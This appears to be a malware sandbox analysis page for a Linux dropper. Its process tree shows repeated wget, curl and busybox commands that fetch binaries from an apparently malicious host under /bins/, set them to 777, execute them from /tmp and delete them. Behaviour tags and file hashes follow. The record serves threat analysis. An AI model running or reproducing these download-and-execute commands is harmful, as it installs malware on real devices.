/usr/bin/wgetwget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:966
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:973
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:994
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:1008
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:1011
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1012
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1013
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1015
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:1018
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97